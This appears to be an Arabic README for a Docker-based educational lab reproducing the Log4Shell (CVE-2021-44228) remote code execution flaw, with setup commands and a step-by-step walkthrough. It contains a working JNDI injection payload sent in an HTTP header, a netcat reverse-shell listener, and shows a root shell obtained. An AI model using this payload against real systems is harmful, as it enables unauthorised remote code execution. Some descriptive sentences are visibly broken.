
مختبر آلي Plug & Play في Docker لتدقيق ودراسة ثغرة Log4Shell (CVE-2021-44228)
مختبر بحث أمني آلي بأمر واحد مصمم لعرض وتدقيق ثغرة Log4Shell (CVE-2021-44228) لتنفيذ الأكواد عن بُعد (RCE).
يجمع هذا المشروع جميع المكونات الضرورية (تطبيق ضعيف، خادم إحالة LDAP خبيث، وأدوات المهاجم) في بنية تحتية شبكية موحدة ومعزولة باستخدام Docker Compose.
.env، أو محاذاة الشبكة. كل شيء يحل تلقائيًا عبر DNS الداخلي لـ Docker.UnsupportedClassVersionError.configurar.sh) يقوم بأتمتة هدم الحاويات، تنظيف الذاكرة المؤقتة، وإعادة البناء.ينشئ المختبر شبكة جسر معزولة (red-log4shell) مع ثلاثة عناصر رئيسية:
web-vulnerable): تطبيق ويب Spring Boot يستخدم نسخة غير مخففة وضعيفة من Log4j (2.14.1) تعمل على Java 8u111.ldap-malicioso): مدعوم من marshalsec لاعتراض طلبات البحث الواردة وإعادة توجيه الضحية ديناميكيًا إلى حمولة المهاجم.kali-tools): حاوية Kali Linux مخصصة تستضيف خادم HTTP بلغة Python لتسليم حمولة الاستغلال المترجمة (Exploit.class) وأداة استماع Netcat لالتقاط الصدفة العكسية.لنشر هذا المختبر على أي جهاز Linux مثبت عليه Docker، قم بتنفيذ الأوامر التالية في الطرفية الخاصة بك:
# 1. Clone the repository
git clone https://github.com/MAFO-sec/mi-laboratorio-log4shell.git
# 2. Navigate to the project directory
cd mi-laboratorio-log4shell
# 3. Grant execution permissions to the script manager and launch the lab
chmod +x configurar.sh
./configurar.sh
🚀 كيفية الاستغلال (خطوة بخطوة)
بمجرد أن تكون البنية التحتية قيد التشغيل تلقائيًا عبر السكربت، اتبع هذه الخطوات لتفعيل الاستغلال والتقاط الصدفة العكسية. الخطوة 1: إعداد مستمع Netcat
افتح طرفية جديدة على جهاز المضيف (Ubuntu) واتصل بحاوية المهاجم لوضع Netcat في وضع الاستعداد للاتصالات الواردة: Bash
sudo docker exec -it kali-tools bash
داخل حاوية Kali، ابدأ المستمع: Bash
nc -lvnp 4444
سترى الرسالة: الاستماع على [أي] 4444 ... الخطوة 2: إطلاق متجه الهجوم
افتح طرفية أخرى منفصلة على جهاز المضيف وأرسل سلسلة حقن JNDI الخبيثة المضمنة في رأس X-Api-Version:
Bash
curl http://localhost:8080/ -H 'X-Api-Version: ${jndi:ldap://ldap-malicioso:1389/Exploit}'
الخطوة 3: التحقق من الصدفة العكسية
ارجع إلى طرفية Netcat الخاصة بك. يجب أن ترى اتصالاً نشطًا. يمكنك الآن تنفيذ الأوامر كجذر داخل خادم الضحية: Bash
connect to [172.21.0.4] from (UNKNOWN) [172.21.0.2] 57164 whoami root
تم إنشاء هذا المستودع بدقة لأغراض تعليمية، وبحث أمني، وتدقيق أكاديمي مصرح به. لا تقم أبدًا بتنفيذ هذه الأدوات أو مهاجمة البنية التحتية دون الحصول على إذن كتابي صريح ومسبق من مالكي البنية التحتية.